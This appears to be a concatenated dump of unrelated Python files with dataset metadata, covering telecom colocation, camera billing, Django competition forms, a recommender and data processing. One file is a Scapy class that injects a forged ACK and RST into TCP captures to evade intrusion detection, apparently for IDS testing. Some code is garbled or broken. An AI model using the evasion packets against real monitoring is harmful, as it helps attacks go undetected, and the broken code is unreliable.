lsti.append([dfi.iat[i,0],dfi.iat[i,1],dfi.iat[i,2],dfi.iat[i,3],dfi.iat[i,4],dfi.iat[i,5],dfi.iat[i,6]])\r\n lstv.append([dfv.iat[j,0],dfv.iat[j,1],dfv.iat[j,2],dfv.iat[j,3],dfv.iat[j,4],dfv.iat[j,5],dfv.iat[j,6]])\r\n\r\n dfid=pd.DataFrame(lsti,columns=['Site_ID', 'Long', 'Lat', 'Site_Type ', '2G Payload', '3G pay load ', '4G Payload '])\r\n dfvo=pd.DataFrame(lstv,columns=['Site_ID', 'Long', 'Lat', 'Site_Type ', '2G Payload', '3G pay load ', '4G Payload '])\r\n\r\n\r\n para_idea=list(all_para_idea)\r\n para_voda=list(all_para_voda)\r\n arr_idea=list(num_array_idea)\r\n arr_voda=list(num_array_voda)\r\n j=0\r\n for i in range(len(all_para_voda)):\r\n j=j+1\r\n if(((all_para_voda[i]) not in parameter_voda) and ((all_para_idea[i]) in parameter_idea)) :\r\n # print(i)\r\n dfid[all_para_idea[i]]=dfid[all_para_idea[i]]+dfvo[all_para_voda[i]]\r\n dfvo[all_para_voda[i]]=0\r\n elif(((all_para_idea[i]) not in parameter_idea) and ((all_para_voda[i]) in parameter_voda)) :\r\n # print(i)\r\n dfvo[all_para_voda[i]]=dfvo[all_para_voda[i]]+dfid[all_para_idea[i]]\r\n dfid[all_para_idea[i]]=0\r\n elif(((all_para_idea[i]) not in parameter_idea) and ((all_para_voda[i]) not in parameter_voda)) :\r\n # print(1)\r\n # print(i)\r\n del dfid[all_para_idea[i]]\r\n del dfvo[all_para_voda[i]]\r\n para_idea.remove(all_para_idea[i])\r\n para_voda.remove(all_para_voda[i])\r\n # if(i+1limit[i]):\r\n if(arg1[i]>arg2[i]):\r\n c[k]=\"Dominant -\" + site1 +\"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n else: \r\n c[k]=\"Dominant -\" + site2 + \"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n elif((0limit[i]):\r\n if(arg1[i]>arg2[i]):\r\n c[k]=\"Dominant -\" + site1 +\"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n else: \r\n c[k]=\"Dominant -\" + site2 + \"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n elif(((arg1[i]>limit[i] and arg2[i]limit[i])) and arg1[i]+arg2[i]>limit[i]):\r\n if(arg1[i]>arg2[i]):\r\n c[k]=\"Dominant -\" + site1 +\"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n else: \r\n c[k]=\"Dominant -\" + site2 + \"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n else:\r\n c[k]=\"Not Possible\"\r\n k=k+1\r\n \r\n \r\n else:\r\n if(a[i]sumb):\r\n c[k]=site1\r\n else:\r\n c[k]=site2\r\n \r\n return c\r\n \r\n\r\n# Run the program\r\nif __name__ == '__main__':\r\n app = wx.App()\r\n frame = MyForm().Show()\r\n app.MainLoop()\r\n print(directory)\r\n","sub_path":"Capacity-Colocation_FrameWork.py","file_name":"Capacity-Colocation_FrameWork.py","file_ext":"py","file_size_in_byte":17532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"417334079","text":"# -*- coding: utf-8 -*-\n\nfrom mongoengine import Document, ReferenceField, StringField, IntField, FloatField, DateTimeField, BooleanField\nfrom datetime import datetime, timedelta\nfrom apps.billing.constans import ACCESS_CAM_ORDER_STATUS\nfrom mongoengine.queryset import Q\n\n\nclass Tariff(Document):\n name = StringField(required=True, unique=True, max_length=255)\n description = StringField()\n cost = FloatField(required=True)\n # in seconds\n duration = IntField(required=False)\n\n # тариф на управление\n is_controlled = BooleanField(default=False)\n\n # пакетный тариф\n is_packet = BooleanField()\n\n\n\n meta = {\n 'ordering': [\n 'name',\n ]\n }\n\n def save(self, *args, **kwargs):\n self.is_packet = bool(self.duration)\n return super(Tariff, self).save(*args, **kwargs)\n\n\n @classmethod\n def get_management_packet_tariff_list(cls):\n return cls.objects(is_controlled=True, is_packet=True)\n \n @classmethod\n def get_management_time_tariff_list(cls):\n return cls.objects(is_controlled=True, is_packet=False)\n \n @classmethod\n def get_view_packet_tariff_list(cls):\n return cls.objects(is_controlled=False, is_packet=True)\n\n @classmethod\n def get_view_time_tariff_list(cls):\n return cls.objects(is_controlled=False, is_packet=False)\n\n\nclass AccessCamOrder(Document):\n is_controlled = BooleanField(default=False)\n tariff = ReferenceField('Tariff')\n duration = FloatField(default=0.0) # in seconds\n count_packets = IntField()\n camera = ReferenceField('Camera')\n user = ReferenceField('User')\n begin_date = DateTimeField()\n end_date = DateTimeField()\n cost = FloatField()\n create_on = DateTimeField(default=datetime.now)\n\n\n @property\n def is_packet(self):\n return self.count_packets is not None\n\n @property\n def status(self):\n if self.begin_date is None:\n return ACCESS_CAM_ORDER_STATUS.WAIT\n now = datetime.now()\n if self.begin_date <= now:\n if self.end_date is None or now < self.end_date:\n return ACCESS_CAM_ORDER_STATUS.ACTIVE\n return ACCESS_CAM_ORDER_STATUS.COMPLETE\n return ACCESS_CAM_ORDER_STATUS.WAIT\n\n\n @classmethod\n def create_packet_type(cls, user, camera, tariff, count_packets):\n assert tariff.is_packet\n order = cls(user=user, camera=camera, tariff=tariff)\n order.count_packets = count_packets\n order.cost = tariff.cost * order.count_packets\n order.duration = order.count_packets * tariff.duration\n order.set_access_period()\n order.save()\n return order\n\n @classmethod\n def create_time_type(cls, user, camera, tariff):\n assert not tariff.is_packet\n order = cls(user=user, camera=camera, tariff=tariff)\n if not order.can_add_time_order():\n raise AccessCamOrder.CanNotAddOrder()\n order.save()\n return order\n\n\n def __init__(self, *args, **kwargs):\n super(AccessCamOrder, self).__init__(*args, **kwargs)\n self.is_controlled = self.tariff.is_controlled\n\n def save(self, *args, **kwargs):\n if self.id is None:\n is_new = True\n super(AccessCamOrder, self).save(*args, **kwargs)\n if self.is_packet and is_new:\n self.user.cash -= self.cost\n self.user.save()\n\n\n def set_end_date(self):\n self.end_date = self.begin_date + timedelta(seconds=self.duration)\n\n def can_add_time_order(self):\n q_data = dict(camera=self.camera,\n is_controlled=self.is_controlled)\n if not self.is_controlled:\n q_data.update(dict(user=self.user))\n last_order = AccessCamOrder.objects(**q_data).order_by('-create_on').only('end_date').first()\n\n if last_order and last_order.end_date is None:\n if self.is_controlled:\n # find time user order\n q_data.update(dict(user=self.user,\n end_date__exists=False,\n count_packets__exists=False, # is not packet\n ))\n if AccessCamOrder.objects(**q_data).count() > 0:\n return False\n else:\n return False\n return True\n\n def set_access_period(self):\n q_data = dict(camera=self.camera,\n is_controlled=self.is_controlled)\n if not self.is_controlled:\n q_data.update(dict(user=self.user))\n last_order = AccessCamOrder.objects(**q_data).order_by('-create_on').only('end_date').first()\n\n now = datetime.now()\n if last_order:\n if last_order.end_date:\n self.begin_date = last_order.end_date if last_order.end_date > now else now\n else: # first order\n self.begin_date = now\n if self.begin_date and self.is_packet:\n self.set_end_date()\n\n def set_time_at_end(self):\n if self.end_date is not None or self.count_packets is not None:\n return False\n self.end_date = self.begin_date + timedelta(seconds=self.duration)\n\n if self.is_controlled:\n orders = AccessCamOrder.objects(camera=self.camera,\n is_controlled=self.is_controlled,\n create_on__gt=self.create_on).order_by('create_on'),all()\n if orders:\n last_end_date = self.end_date\n for order in orders:\n if order.count_packets is not None:\n break\n order.begin_date = last_end_date + timedelta(seconds=1)\n order.set_end_date()\n order.save()\n last_end_date = order.end_date\n if self.is_controlled:\n self.camera.operator = orders[0].user\n else:\n self.camera.operator = None\n self.camera.save()\n\n def can_access(self):\n return self.status == ACCESS_CAM_ORDER_STATUS.ACTIVE\n\n def get_time_left(self, user_cash=None):\n user_cash = user_cash or self.user.cash\n if user_cash < 0:\n return 0\n return int(user_cash/self.tariff.cost)\n\n\n class CanNotAddOrder(Exception):\n pass","sub_path":"apps/billing/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"231713400","text":"from scapy.all import *\n\n\"\"\"\npackets will always be as such\nas long as it is TCP and established\n\npackets[0] -> SYN\npackets[1] -> SYN-ACK\npackets[2] -> ACK\npackets[3] -> DATA\npackets[4] -> ACK\npackets[5] -> FIN-ACK\npackets[6] -> ACK\n\"\"\"\n\nclass Evasion:\n\tdef __init__(self, packets):\n\t\tself.type = \"\"\n\t\tself.credit = \"\"\n\t\tself.packets = packets\n\n\tdef alteredAck(self):\n\t\tself.credit = \"Judy Novak\"\n\t\tself.type = \"client\"\n\t\t\n\t\t#Create the RST\n\t\tsource = self.packets[2][IP].src\n\t\tdestination = self.packets[2][IP].dst\n\t\tsrcport = self.packets[2][TCP].sport\n\t\tdstport = self.packets[2][TCP].dport\n\t\tseqnum = self.packets[2][TCP].seq\n\t\tacknum = self.packets[2][TCP].ack\n\n\t\tfakeAck = IP(src=source, dst=destination)/TCP(sport=srcport, dport=dstport, flags=\"A\", seq=seqnum, ack=acknum+1)\n\n\t\trst = IP(src=destination, dst=source)/TCP(sport=dstport, dport=srcport, flags=\"R\", seq=acknum)\n\n\t\t#The rst packet needs to go after the fake rst\n\t\tstore = []\n\t\tfor i in range(5):\n\t\t\tstore.append(self.packets.pop())\n\t\tstore.reverse()\n\n\t\t#Append the fake ACK followed by the RST\n\t\tself.packets.append(fakeAck)\n\t\tself.packets.append(rst)\n\n\t\t#Tack on all of the original packets\n\t\tfor packet in store:\n\t\t\tself.packets.append(packet)\n\n\t\treturn self.packets\n","sub_path":"Generator/Evasion.py","file_name":"Evasion.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"320961979","text":"import numpy as np\nimport pickle\nimport torch\nimport torch.optim as optim\nfrom model import GCN_GRU, GRU, Net\nfrom env import Simulator, Config\nfrom dataloader import *\nfrom collections import deque\ndef pretrain_embedding(config, entity_vocab, relation_vocab, model, optimizer):\n model.train()\n\n dataloader = get_TransE_dataloader(config, entity_vocab, relation_vocab)\n for epoch in range(2):\n total_loss = 0\n for positive_triples, negative_triples in dataloader: \n optimizer.zero_grad()\n loss = model.TransE_forward(positive_triples, negative_triples)\n loss.backward()\n optimizer.step()\n\n total_loss += loss.item()\n print('TransE epoch', epoch, 'loss', total_loss)\n\n\ndef train(config, item_vocab, model, optimizer):\n memory = deque(maxlen=10000)\n policy_net = Net()\n target_net = Net()\n TARGET_UPDATE = 100\n BATCH_SIZE = 10\n def tmp_Q_eps_greedy(state, actions):\n epsilon = 0.3\n state = torch.tensor(state, dtype=torch.float)\n out = policy_net.forward(state)\n out = out.detach().numpy()\n coin = random.random()\n if coin < epsilon:\n return actions[np.random.choice(range(len(actions)))]\n else:\n return actions[np.argmax(out)]\n \n def memory_sampling(memory):\n mini_batch = random.sample(memory, BATCH_SIZE)\n s_lst, a_lst, r_lst, s_prime_lst, done_mask_lst = [], [], [], [], []\n\n for transition in mini_batch:\n t_state, t_action, t_reward, t_next_state, t_done = transition\n s_lst.append(t_state)\n a_lst.append([t_action])\n r_lst.append([t_reward])\n s_prime_lst.append(t_next_state)\n done_mask_lst.append([t_done])\n return torch.tensor(s_lst, dtype=torch.float), torch.tensor(a_lst), torch.tensor(r_lst), torch.tensor(s_prime_lst, dtype=torch.float), torch.tensor(done_mask_lst)\n\n def optimize_model(memory):\n state_batch, action_batch, reward_batch, next_state_batch, done_batch = memory_sampling(memory)\n state_action_values = policy_net(state_batch) \n next_state_values = target_net(next_state_batch)\n for next_state_value in next_state_values:\n max_val = max(next_state_value).tolist()\n max_val_list.append(max_val)\n expected_state_action_values = state_action_values.tolist()\n for i in range(len(state_action_values)):\n action = action_batch[i]\n expected_state_action_values[i][action] = (max_val_list[i] * GAMMA) + reward_batch[i]\n expected_state_action_values = torch.tensor(expected_state_action_values)\n loss = F.smooth_l1_loss(state_action_values, expected_state_action_values)\n #print('loss', loss)\n optimizer = optim.RMSprop(self.policy_net.parameters())\n optimizer.zero_grad()\n loss.backward()\n for param in self.policy_net.parameters():\n param.grad.data.clamp_(-1, 1)\n optimizer.step()\n\n simulator = Simulator(config=config, mode='train')\n num_users = len(simulator)\n total_step_count = 0\n for e in range(config.epochs):\n for u in range(num_users):\n user_id, item_ids, rates = simulator.get_data(u)\n candidates = []\n done = False\n print('user_id:', user_id)\n for t, (item_id, rate) in enumerate(zip(item_ids, rates)):\n if t == len(item_ids)-1: done = True\n print('t',t,'item_id',item_id,'rate',rate)\n # TODO\n # Embed item using GCN Algorithm1 line 6 ~ 7\n item_idx = item_id\n embedded_item_state = model.entity_emb.weight[item_idx] # (50)\n embedded_user_state = model(item_idx) # (20)\n\n # TODO\n # Candidate selection and embedding\n if rate > config.threshold:\n n_hop_dict = model.get_n_hop(item_id)\n candidates.extend(n_hop_dict[1])\n candidates = list(set(candidates)) # Need to get rid of recommended items\n\n candidates_embeddings = model.entity_emb.weight[torch.tensor(candidates, dtype=torch.int64)]\n print('candidate shape:',candidates_embeddings.shape)\n # candidates_embeddings = item_ids # Embed each item in n_hop_dict using each item's n_hop_dict\n # candidates_embeddings' shape = (# of candidates, config.item_embed_dim)\n\n # Recommendation using epsilon greedy policy\n recommend_item_id = tmp_Q_eps_greedy(state=embedded_user_state, actions=candidates_embeddings)\n reward = simulator.step(user_id, recommend_item_id)\n\n # TODO\n # Q learning\n # Store transition to buffer\n state, action, reward, next_state, done = embedded_user_state, recommend_item_id, reward, tmp_state_embed(x.append(recommend_item_id)), done # done을 어떻게 하지?\n Tuple = (state, action, reward, next_state, done) \n memory.append(Tuple)\n # target update\n total_step_count+=1\n if total_step_count % TARGET_UPDATE ==0:\n target_net.load_state_dict(policy_net.state_dict())\n if len(memory) > 100: \n optimize_model(memory)\n\nif __name__ == '__main__':\n\n with open('./data/movie/entity_vocab.pkl','rb') as f:\n entity_vocab = pickle.load(f)\n with open('./data/movie/item_vocab.pkl','rb') as f:\n item_vocab = pickle.load(f)\n with open('./data/movie/relation_vocab.pkl','rb') as f:\n relation_vocab = pickle.load(f)\n\n print('| Building Net')\n #model = GCN_GRU(Config(), 50, entity_vocab, relation_vocab)\n model = GRU(Config(), 50, entity_vocab, relation_vocab)\n optimizer = optim.SGD(model.parameters(), lr=0.01)\n ''' \n print('Embedding pretrain by TransE...')\n pretrain_embedding(Config(), entity_vocab, relation_vocab, model, optimizer)\n \n print('Save embedding_pretrained model...')\n path = './embedding_pretrained.pth'\n torch.save(model.state_dict(),path)\n \n print('Load embedding_pretrained model...')\n path = './embedding_pretrained.pth'\n model.load_state_dict(torch.load(path))\n '''\n print('Train...')\n train(Config(), item_vocab, model, optimizer)\n","sub_path":"wo_GCN_train.py","file_name":"wo_GCN_train.py","file_ext":"py","file_size_in_byte":6465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"437662884","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.forms.models import BaseModelFormSet, ModelForm\nfrom django.utils.encoding import force_unicode\nfrom django.utils.html import mark_safe\nfrom django.utils.translation import get_language\nfrom django.utils.translation import ugettext as _\nfrom django.utils.translation import ugettext_lazy\n\nfrom skoljka.competition.evaluator import (\n get_evaluator,\n get_solution_help_text,\n safe_parse_descriptor,\n)\nfrom skoljka.competition.evaluator_base import InvalidDescriptor, InvalidSolution\nfrom skoljka.competition.models import Chain, CompetitionTask, Team, TeamMember\nfrom skoljka.competition.utils import (\n comp_url,\n ctask_comment_class,\n parse_team_categories,\n)\nfrom skoljka.utils import xss\n\n\nclass CompetitionSolutionForm(forms.Form):\n result = forms.CharField(max_length=255)\n\n def __init__(self, *args, **kwargs):\n self.descriptor = kwargs.pop('descriptor')\n self.evaluator = kwargs.pop('evaluator')\n super(CompetitionSolutionForm, self).__init__(*args, **kwargs)\n\n def clean_result(self):\n data = self.cleaned_data['result']\n try:\n self.evaluator.check_result(self.descriptor, data)\n except InvalidSolution as e:\n # TODO: Make a base form that automatically does this (depending on\n # a parameter).\n self.fields['result'].widget.attrs.update({'class': 'ctask-submit-error'})\n raise forms.ValidationError(unicode(e))\n except InvalidDescriptor as e:\n self.fields['result'].widget.attrs.update({'class': 'ctask-submit-error'})\n raise forms.ValidationError(_(\"Descriptor error. Please notify admins!\"))\n return data\n\n\nclass BaseCompetitionTaskFormSet(BaseModelFormSet):\n def add_fields(self, form, index):\n super(BaseCompetitionTaskFormSet, self).add_fields(form, index)\n # initial_text = form.instance.pk and form.instance.task.content.text\n # form.fields[\"text\"] = forms.CharField(widget=forms.Textarea,\n # initial=initial_text)\n\n\nclass CompetitionTaskForm(ModelForm):\n name = forms.CharField()\n text = forms.CharField(widget=forms.Textarea)\n comment = forms.CharField(widget=forms.Textarea, required=False)\n\n def __init__(self, *args, **kwargs):\n self.competition = kwargs.pop('competition')\n self.evaluator = get_evaluator(self.competition.evaluator_version)\n self.fixed_score = self.competition.fixed_task_score\n user = kwargs.pop('user')\n super(CompetitionTaskForm, self).__init__(*args, **kwargs)\n\n self.t_comment_extra_class = \"ctask-comment\"\n if self.instance.pk:\n self.fields['name'].initial = self.instance.task.name\n self.fields['text'].initial = self.instance.task.content.text\n self.fields['comment'].initial = self.instance.comment.text\n self.t_comment_extra_class += \" \" + ctask_comment_class(self.instance, user)\n\n descriptor = self.initial.get('descriptor')\n if descriptor:\n variables = safe_parse_descriptor(self.evaluator, descriptor)\n self.fields['descriptor'].help_text = get_solution_help_text(\n variables, error_message=_(\"Invalid!\"), show_types=True\n )\n self.fields['descriptor'].label = mark_safe(\n xss.escape(_(\"Solution\"))\n + ' '\n )\n if not self.competition.use_custom_ctask_names():\n del self.fields['name']\n if self.fixed_score:\n del self.fields['max_score']\n\n self.fields['text'].widget.attrs.update(\n {'class': 'comp-mathcontent-text', 'rows': 15}\n )\n self.fields['comment'].widget.attrs.update(\n {'class': 'comp-mathcontent-text ctask-comment', 'rows': 3}\n )\n\n def clean(self):\n super(CompetitionTaskForm, self).clean()\n self.instance._text = self.cleaned_data.get('text')\n self.instance._comment = self.cleaned_data.get('comment')\n if self.fixed_score:\n self.instance.max_score = self.fixed_score\n return self.cleaned_data\n\n def clean_descriptor(self):\n data = self.cleaned_data['descriptor']\n try:\n variables = self.evaluator.parse_descriptor(data)\n except InvalidDescriptor as e:\n self.fields['descriptor'].help_text = \"\"\n raise forms.ValidationError(unicode(e))\n self.fields['descriptor'].help_text = variables[0].help_text()\n return data\n\n class Meta:\n model = CompetitionTask\n fields = ('descriptor', 'max_score')\n\n\nclass ChainForm(forms.ModelForm):\n \"\"\"Form for creating or editing chains.\n\n For course-like competitions, the `unlock_minutes` field is replaced with\n an `unlock_days` field.\n \"\"\"\n\n class Meta:\n model = Chain\n fields = [\n 'name',\n 'category',\n 'unlock_minutes',\n 'bonus_score',\n 'position',\n 'unlock_mode',\n ]\n\n def __init__(self, *args, **kwargs):\n self.competition = kwargs.pop('competition')\n super(ChainForm, self).__init__(*args, **kwargs)\n if self.competition.is_course:\n del self.fields['unlock_minutes']\n days = self.instance.unlock_minutes / (24 * 60.0) if self.instance else 0\n self.fields['unlock_days'] = forms.FloatField(\n label=_(\"Unlock days\"), min_value=0, initial=days\n )\n\n def clean(self):\n data = self.cleaned_data\n if self.competition.is_course:\n self.cleaned_data['unlock_minutes'] = int(\n (data['unlock_days'] or 0) * 24 * 60\n )\n del data['unlock_days']\n return data\n\n\ndef clean_unused_ctask_ids(competition, ctask_ids):\n if not ctask_ids:\n return [], []\n try:\n ctask_ids = [int(x) for x in ctask_ids.split(',')]\n except ValueError:\n raise ValidationError(\"Invalid input.\")\n ctasks_dict = CompetitionTask.objects.filter(competition=competition).in_bulk(\n ctask_ids\n )\n if len(ctask_ids) != len(ctasks_dict):\n raise ValidationError(\"Unknown competition task ID.\")\n for ctask in ctasks_dict.itervalues():\n if ctask.chain_id is not None:\n raise ValidationError(\"Some tasks were already used.\")\n ctasks = [ctasks_dict[id] for id in ctask_ids]\n return ctask_ids, ctasks\n\n\nclass ChainTasksForm(ChainForm):\n ctask_ids = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n def __init__(self, *args, **kwargs):\n super(ChainTasksForm, self).__init__(*args, **kwargs)\n\n self.fields['name'].widget.attrs.update({'class': 'span6'})\n self.fields['category'].widget.attrs.update({'class': 'span2'})\n if 'unlock_minutes' in self.fields:\n self.fields['unlock_minutes'].widget.attrs.update({'class': 'span1'})\n else:\n self.fields['unlock_days'].widget.attrs.update({'class': 'span1'})\n self.fields['bonus_score'].widget.attrs.update({'class': 'span1'})\n self.fields['position'].widget.attrs.update({'class': 'span1'})\n self.fields['ctask_ids'].widget.attrs.update({'id': 'cchain-unused-ctasks-ids'})\n\n def clean_ctask_ids(self):\n ctask_ids, ctasks = clean_unused_ctask_ids(\n self.competition, self.cleaned_data['ctask_ids']\n )\n self.cleaned_data['ctasks'] = ctasks\n return ctask_ids\n\n\nclass TeamCategoryRadioSelectRenderer(forms.widgets.RadioFieldRenderer):\n def render(self):\n \"\"\"Customize radio select render, not to use
        .\"\"\"\n return mark_safe(u'\\n'.join([force_unicode(w) for w in self]))\n\n\nclass TeamForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n lang = get_language()\n instance = kwargs.get('instance', None)\n initial = dict(kwargs.pop('initial', {}))\n extra_fields = []\n competition = kwargs.pop('competition')\n self.competition_id = competition.id\n self.max_team_size = kwargs.pop('max_team_size', 3)\n self.user = kwargs.pop('user')\n\n if instance:\n # Author cannot be removed from the team.\n team_members = list(\n TeamMember.objects.filter(team=instance)\n .exclude(member_id=instance.author_id)\n .values_list('member_name', 'member_id')\n )\n else:\n team_members = []\n\n # Add extra fields for other members.\n for k in xrange(2, self.max_team_size + 1):\n if k - 2 < len(team_members):\n member_name = team_members[k - 2]\n else:\n member_name = ''\n field_manual = 'member{}_manual'.format(k)\n field_username = 'member{}_username'.format(k)\n initial[field_manual] = member_name\n initial[field_username] = member_name\n\n # Label empty because HTML generated via JavaScript anyway.\n extra_fields.append(\n (field_manual, forms.CharField(required=False, label=\"\", max_length=64))\n )\n extra_fields.append(\n (\n field_username,\n forms.CharField(\n required=False, max_length=32, widget=forms.HiddenInput()\n ),\n )\n )\n\n # Parse team category string.\n try:\n categories = parse_team_categories(competition.team_categories, lang)\n except (ValueError, KeyError, TypeError) as e:\n categories = [(1, \"team_categories invalid!!! \" + e.message)]\n self.team_categories = categories\n if categories and (not instance or not instance.category):\n initial['category'] = categories[-1][0] # For simplicity.\n\n super(TeamForm, self).__init__(initial=initial, *args, **kwargs)\n\n # Preserve order.\n for key, value in extra_fields:\n self.fields[key] = value\n\n self.fields['name'].widget.attrs['class'] = 'input-large'\n self.fields['name'].error_messages['required'] = _(\"Team name cannot be empty.\")\n\n if categories:\n self.fields['category'].widget = forms.RadioSelect(\n choices=categories, renderer=TeamCategoryRadioSelectRenderer\n )\n else:\n del self.fields['category']\n\n def _clean_member(self, index):\n manual = self.cleaned_data.get('member{}_manual'.format(index))\n username = self.cleaned_data.get('member{}_username'.format(index))\n\n if username and username.strip():\n username = username.strip()\n try:\n user = User.objects.get(username__iexact=username)\n except User.DoesNotExist:\n raise ValidationError(_(\"Unknown username \\\"%s\\\".\") % username)\n if user.id == self.user.id:\n raise ValidationError(_(\"You are automatically added to the team.\"))\n if (\n TeamMember.objects.filter(\n team__competition_id=self.competition_id,\n member_id=user.id,\n invitation_status=TeamMember.INVITATION_ACCEPTED,\n )\n .exclude(team_id=self.instance.id)\n .exists()\n ):\n msg = _(\"User \\\"%s\\\" is already a member of a team.\") % username\n raise ValidationError(msg)\n return (user.username, user)\n if manual and manual.strip():\n return (manual.strip(), None)\n return None\n\n def clean_name(self):\n name = self.cleaned_data['name'].strip()\n if (\n Team.objects.filter(competition_id=self.competition_id, name__iexact=name)\n .exclude(id=self.instance.id)\n .exists()\n ):\n raise ValidationError(_(\"Team name already used!\"))\n return name\n\n def clean(self):\n members = []\n ids = set()\n for k in xrange(2, self.max_team_size + 1):\n member = self._clean_member(k)\n if not member:\n continue\n if isinstance(member[1], User):\n if member[1].id not in ids:\n ids.add(member[1].id)\n members.append(member)\n else:\n members.append(member)\n\n self._members = members\n\n if self.team_categories:\n try:\n category = self.cleaned_data['category']\n except KeyError:\n self.cleaned_data['category'] = self.team_categories[-1][0]\n else:\n if not any(category == k for k, v in self.team_categories):\n raise ValidationError(_(\"Unknown team category '%s'!\") % category)\n\n return self.cleaned_data\n\n class Meta:\n model = Team\n fields = ['name', 'category']\n\n\nclass TaskListAdminPanelForm(forms.Form):\n filter_by_team_type = forms.ChoiceField(\n [\n (Team.TYPE_NORMAL, ugettext_lazy(\"Competitors\")),\n (Team.TYPE_UNOFFICIAL, ugettext_lazy(\"Unofficial\")),\n (Team.TYPE_ADMIN_PRIVATE, ugettext_lazy(\"Administrators\")),\n ]\n )\n filter_by_status = forms.ChoiceField(\n [('S', \"Solved\"), ('F', \"Failed\"), ('T', \"Tried\")]\n )\n","sub_path":"skoljka/competition/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":13623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"579773626","text":"import numpy as np\nimport pandas as pd\nfrom collections import defaultdict\n\n## load data\ntr = pd.read_csv('../temporal_data/train_id_cnt_svd_stamp.csv')\nte = pd.read_csv('../temporal_data/test_id_cnt_svd_stamp.csv')\n\nprint('data loaded.')\nprint(len(tr))\nprint(len(te))\n\n## continous index\nconcat = tr[['msno', 'song_id', 'source_type', 'source_screen_name', 'timestamp']].append(te[['msno', \\\n 'song_id', 'source_type', 'source_screen_name', 'timestamp']])\n\n## before data\nsong_dict = defaultdict(lambda: None)\ntype_dict = defaultdict(lambda: None)\nname_dict = defaultdict(lambda: None)\ntime_dict = defaultdict(lambda: None)\n\nbefore_data = np.zeros((len(concat), 4))\nfor i in range(len(concat)):\n msno = concat['msno'].values[i]\n \n if(song_dict[msno] == None):\n before_data[i] = concat[['song_id', 'source_type', 'source_screen_name', 'timestamp']].values[i]\n before_data[i, 3] = np.nan\n else:\n before_data[i, 0] = song_dict[msno]\n before_data[i, 1] = type_dict[msno]\n before_data[i, 2] = name_dict[msno]\n before_data[i, 3] = time_dict[msno]\n\n song_dict[msno] = concat['song_id'].values[i]\n type_dict[msno] = concat['source_type'].values[i]\n name_dict[msno] = concat['source_screen_name'].values[i]\n time_dict[msno] = concat['timestamp'].values[i]\n\nprint('data before done.')\n\n## after data\nsong_dict = defaultdict(lambda: None)\ntype_dict = defaultdict(lambda: None)\nname_dict = defaultdict(lambda: None)\ntime_dict = defaultdict(lambda: None)\n\nafter_data = np.zeros((len(concat), 4))\nfor i in range(len(concat))[::-1]:\n msno = concat['msno'].values[i]\n \n if(song_dict[msno] == None):\n after_data[i] = concat[['song_id', 'source_type', 'source_screen_name', 'timestamp']].values[i]\n after_data[i, 3] = np.nan\n else:\n after_data[i, 0] = song_dict[msno]\n after_data[i, 1] = type_dict[msno]\n after_data[i, 2] = name_dict[msno]\n after_data[i, 3] = time_dict[msno]\n\n song_dict[msno] = concat['song_id'].values[i]\n type_dict[msno] = concat['source_type'].values[i]\n name_dict[msno] = concat['source_screen_name'].values[i]\n time_dict[msno] = concat['timestamp'].values[i]\n\nprint('data after done.')\n\n## to_csv\nidx = 0\nfor i in ['song_id', 'source_type', 'source_screen_name', 'timestamp']:\n tr['before_'+i] = before_data[:len(tr), idx]\n tr['after_'+i] = after_data[:len(tr), idx]\n \n te['before_'+i] = before_data[len(tr):, idx]\n te['after_'+i] = after_data[len(tr):, idx]\n \n idx += 1\n\nfor i in ['song_id', 'source_type', 'source_screen_name']:\n tr['before_'+i] = tr['before_'+i].astype(int)\n te['before_'+i] = te['before_'+i].astype(int)\n tr['after_'+i] = tr['after_'+i].astype(int)\n te['after_'+i] = te['after_'+i].astype(int)\n\ntr['before_timestamp'] = np.log1p(tr['timestamp'] - tr['before_timestamp'])\nte['before_timestamp'] = np.log1p(te['timestamp'] - te['before_timestamp'])\n\ntr['after_timestamp'] = np.log1p(tr['after_timestamp'] - tr['timestamp'])\nte['after_timestamp'] = np.log1p(te['after_timestamp'] - te['timestamp'])\n\ntr['before_timestamp'].fillna(np.nanmean(tr['before_timestamp']), inplace=True)\nte['before_timestamp'].fillna(np.nanmean(te['before_timestamp']), inplace=True)\ntr['after_timestamp'].fillna(np.nanmean(tr['after_timestamp']), inplace=True)\nte['after_timestamp'].fillna(np.nanmean(te['after_timestamp']), inplace=True)\n\ntr.to_csv('../temporal_data/train_id_cnt_svd_stamp_before_after.csv', index=False)\nte.to_csv('../temporal_data/test_id_cnt_svd_stamp_before_after.csv', index=False)\n","sub_path":"input/validation/script/before_after_process.py","file_name":"before_after_process.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"166525176","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom skimage import io\n\nrecons_train_data_list = 'data_info/recons_train_data_patch_list.txt'\n\ndef read_image_list(data_list):\n f = open(data_list, 'r')\n image_paths = []\n for line in f:\n image = line.strip(\"\\n\")\n image_paths.append(image)\n\n return image_paths\n\n\n# # https://stackoverflow.com/questions/15638612/calculating-mean-and-standard-deviation-of-the-data-which-does-not-fit-in-memory\n# def online_mean_and_std(image_list):\n# n = 0\n# mean = 0\n# var = 0\n\n# count = 0\n\n# for index, image_path in enumerate(image_list):\n# x = io.imread(image_path)\n# x = np.asarray(x, dtype=np.float32)\n# 